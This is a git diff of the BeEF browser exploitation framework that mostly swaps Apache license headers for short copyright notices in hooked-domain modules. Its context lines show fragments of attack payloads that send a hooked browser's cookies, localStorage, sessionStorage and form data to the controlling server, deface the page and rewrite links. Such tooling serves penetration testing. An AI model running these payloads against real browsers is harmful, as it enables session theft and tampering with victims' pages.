//Regular expression to match script names in source diff --git a/modules/browser/hooked_domain/ajax_fingerprint/config.yaml b/modules/browser/hooked_domain/ajax_fingerprint/config.yaml index 8216f7223..1458ac7ae 100644 --- a/modules/browser/hooked_domain/ajax_fingerprint/config.yaml +++ b/modules/browser/hooked_domain/ajax_fingerprint/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/hooked_domain/ajax_fingerprint/module.rb b/modules/browser/hooked_domain/ajax_fingerprint/module.rb index 279cccf47..68227c438 100644 --- a/modules/browser/hooked_domain/ajax_fingerprint/module.rb +++ b/modules/browser/hooked_domain/ajax_fingerprint/module.rb @@ -1,17 +1,8 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. class Ajax_fingerprint < BeEF::Core::Command 
diff --git a/modules/browser/hooked_domain/alert_dialog/command.js b/modules/browser/hooked_domain/alert_dialog/command.js index a5f5e57c5..81d57d9e7 100644 --- a/modules/browser/hooked_domain/alert_dialog/command.js +++ b/modules/browser/hooked_domain/alert_dialog/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { alert("<%== format_multiline(@text) %>"); diff --git a/modules/browser/hooked_domain/alert_dialog/config.yaml b/modules/browser/hooked_domain/alert_dialog/config.yaml index 2b9c05a1b..2ff2ea2d0 100644 --- a/modules/browser/hooked_domain/alert_dialog/config.yaml +++ b/modules/browser/hooked_domain/alert_dialog/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/hooked_domain/alert_dialog/module.rb b/modules/browser/hooked_domain/alert_dialog/module.rb index a1750451a..b4eea8e80 100644 --- a/modules/browser/hooked_domain/alert_dialog/module.rb +++ b/modules/browser/hooked_domain/alert_dialog/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Alert_dialog < BeEF::Core::Command 
diff --git a/modules/browser/hooked_domain/deface_web_page/command.js b/modules/browser/hooked_domain/deface_web_page/command.js index feff12512..b78cce34d 100644 --- a/modules/browser/hooked_domain/deface_web_page/command.js +++ b/modules/browser/hooked_domain/deface_web_page/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { document.body.innerHTML = "<%= @deface_content %>"; diff --git a/modules/browser/hooked_domain/deface_web_page/config.yaml b/modules/browser/hooked_domain/deface_web_page/config.yaml index 8d57a6cfe..ff51d8082 100644 --- a/modules/browser/hooked_domain/deface_web_page/config.yaml +++ b/modules/browser/hooked_domain/deface_web_page/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/hooked_domain/deface_web_page/module.rb b/modules/browser/hooked_domain/deface_web_page/module.rb index ec5affdfc..e05b14404 100644 --- a/modules/browser/hooked_domain/deface_web_page/module.rb +++ b/modules/browser/hooked_domain/deface_web_page/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Deface_web_page < BeEF::Core::Command 
diff --git a/modules/browser/hooked_domain/get_cookie/command.js b/modules/browser/hooked_domain/get_cookie/command.js index 7f0049186..93ae9ec01 100644 --- a/modules/browser/hooked_domain/get_cookie/command.js +++ b/modules/browser/hooked_domain/get_cookie/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { beef.net.send("<%= @command_url %>", <%= @command_id %>, 'cookie='+document.cookie); diff --git a/modules/browser/hooked_domain/get_cookie/config.yaml b/modules/browser/hooked_domain/get_cookie/config.yaml index a5670e31e..f63a389dd 100644 --- a/modules/browser/hooked_domain/get_cookie/config.yaml +++ b/modules/browser/hooked_domain/get_cookie/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/hooked_domain/get_cookie/module.rb b/modules/browser/hooked_domain/get_cookie/module.rb index ba0fc1350..81061bc89 100644 --- a/modules/browser/hooked_domain/get_cookie/module.rb +++ b/modules/browser/hooked_domain/get_cookie/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Get_cookie < BeEF::Core::Command 
diff --git a/modules/browser/hooked_domain/get_local_storage/command.js b/modules/browser/hooked_domain/get_local_storage/command.js index 72db98fd6..47ed1855b 100644 --- a/modules/browser/hooked_domain/get_local_storage/command.js +++ b/modules/browser/hooked_domain/get_local_storage/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { if ('localStorage' in window && window['localStorage'] !== null) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "localStorage="+JSON.stringify(window['localStorage'])); diff --git a/modules/browser/hooked_domain/get_local_storage/config.yaml b/modules/browser/hooked_domain/get_local_storage/config.yaml index f008244b3..00e8e7f37 100644 --- a/modules/browser/hooked_domain/get_local_storage/config.yaml +++ b/modules/browser/hooked_domain/get_local_storage/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/hooked_domain/get_local_storage/module.rb b/modules/browser/hooked_domain/get_local_storage/module.rb index fd57f511e..c65b063c0 100644 --- a/modules/browser/hooked_domain/get_local_storage/module.rb +++ b/modules/browser/hooked_domain/get_local_storage/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Get_local_storage < BeEF::Core::Command 
diff --git a/modules/browser/hooked_domain/get_page_html/command.js b/modules/browser/hooked_domain/get_page_html/command.js index 51926584c..2151880a2 100644 --- a/modules/browser/hooked_domain/get_page_html/command.js +++ b/modules/browser/hooked_domain/get_page_html/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { try { diff --git a/modules/browser/hooked_domain/get_page_html/config.yaml b/modules/browser/hooked_domain/get_page_html/config.yaml index a4e51a376..0f86badae 100644 --- a/modules/browser/hooked_domain/get_page_html/config.yaml +++ b/modules/browser/hooked_domain/get_page_html/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/hooked_domain/get_page_html/module.rb b/modules/browser/hooked_domain/get_page_html/module.rb index 6ef33ad89..2d2eecac8 100644 --- a/modules/browser/hooked_domain/get_page_html/module.rb +++ b/modules/browser/hooked_domain/get_page_html/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Get_page_html < BeEF::Core::Command 
diff --git a/modules/browser/hooked_domain/get_page_links/command.js b/modules/browser/hooked_domain/get_page_links/command.js index 9f12337ac..0af4ca888 100644 --- a/modules/browser/hooked_domain/get_page_links/command.js +++ b/modules/browser/hooked_domain/get_page_links/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "links="+beef.dom.getLinks()); diff --git a/modules/browser/hooked_domain/get_page_links/config.yaml b/modules/browser/hooked_domain/get_page_links/config.yaml index 1b1ed13f3..d316522a2 100644 --- a/modules/browser/hooked_domain/get_page_links/config.yaml +++ b/modules/browser/hooked_domain/get_page_links/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/hooked_domain/get_page_links/module.rb b/modules/browser/hooked_domain/get_page_links/module.rb index c8c005c96..66c639ebd 100644 --- a/modules/browser/hooked_domain/get_page_links/module.rb +++ b/modules/browser/hooked_domain/get_page_links/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Get_page_links < BeEF::Core::Command 
diff --git a/modules/browser/hooked_domain/get_session_storage/command.js b/modules/browser/hooked_domain/get_session_storage/command.js index 9e23c3c9e..13346737e 100644 --- a/modules/browser/hooked_domain/get_session_storage/command.js +++ b/modules/browser/hooked_domain/get_session_storage/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { if ('sessionStorage' in window && window['sessionStorage'] !== null) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "sessionStorage="+JSON.stringify(window['sessionStorage'])); diff --git a/modules/browser/hooked_domain/get_session_storage/config.yaml b/modules/browser/hooked_domain/get_session_storage/config.yaml index 39d1cff08..5f54cb91c 100644 --- a/modules/browser/hooked_domain/get_session_storage/config.yaml +++ b/modules/browser/hooked_domain/get_session_storage/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/hooked_domain/get_session_storage/module.rb b/modules/browser/hooked_domain/get_session_storage/module.rb index 6b75c2eeb..40a196ae8 100644 --- a/modules/browser/hooked_domain/get_session_storage/module.rb +++ b/modules/browser/hooked_domain/get_session_storage/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Get_session_storage < BeEF::Core::Command 
diff --git a/modules/browser/hooked_domain/get_stored_credentials/command.js b/modules/browser/hooked_domain/get_stored_credentials/command.js index 948435a53..080b4e49e 100644 --- a/modules/browser/hooked_domain/get_stored_credentials/command.js +++ b/modules/browser/hooked_domain/get_stored_credentials/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var form_data = new Array(); diff --git a/modules/browser/hooked_domain/get_stored_credentials/config.yaml b/modules/browser/hooked_domain/get_stored_credentials/config.yaml index 1c01a0391..f610c5fca 100644 --- a/modules/browser/hooked_domain/get_stored_credentials/config.yaml +++ b/modules/browser/hooked_domain/get_stored_credentials/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/hooked_domain/get_stored_credentials/module.rb b/modules/browser/hooked_domain/get_stored_credentials/module.rb index 243fddcbe..0e1277855 100644 --- a/modules/browser/hooked_domain/get_stored_credentials/module.rb +++ b/modules/browser/hooked_domain/get_stored_credentials/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Get_stored_credentials < BeEF::Core::Command 
diff --git a/modules/browser/hooked_domain/link_rewrite/command.js b/modules/browser/hooked_domain/link_rewrite/command.js index 03c9ac917..75702b158 100644 --- a/modules/browser/hooked_domain/link_rewrite/command.js +++ b/modules/browser/hooked_domain/link_rewrite/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+beef.dom.rewriteLinks('<%= @url %>')+' links rewritten to <%= @url %>'); }); diff --git a/modules/browser/hooked_domain/link_rewrite/config.yaml b/modules/browser/hooked_domain/link_rewrite/config.yaml index f458eb1e0..5c5cbecf8 100644 --- a/modules/browser/hooked_domain/link_rewrite/config.yaml +++ b/modules/browser/hooked_domain/link_rewrite/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/hooked_domain/link_rewrite/module.rb b/modules/browser/hooked_domain/link_rewrite/module.rb index 9176a2173..dabb6f189 100644 --- a/modules/browser/hooked_domain/link_rewrite/module.rb +++ b/modules/browser/hooked_domain/link_rewrite/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Link_rewrite < BeEF::Core::Command 
diff --git a/modules/browser/hooked_domain/link_rewrite_sslstrip/command.js b/modules/browser/hooked_domain/link_rewrite_sslstrip/command.js index 9e68bc542..de3739f8d 100644 --- a/modules/browser/hooked_domain/link_rewrite_sslstrip/command.js +++ b/modules/browser/hooked_domain/link_rewrite_sslstrip/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { selector = "a"; diff --git a/modules/browser/hooked_domain/link_rewrite_sslstrip/config.yaml b/modules/browser/hooked_domain/link_rewrite_sslstrip/config.yaml index 176ec2f69..3ce3065b5 100644 --- a/modules/browser/hooked_domain/link_rewrite_sslstrip/config.yaml +++ b/modules/browser/hooked_domain/link_rewrite_sslstrip/config.yaml 
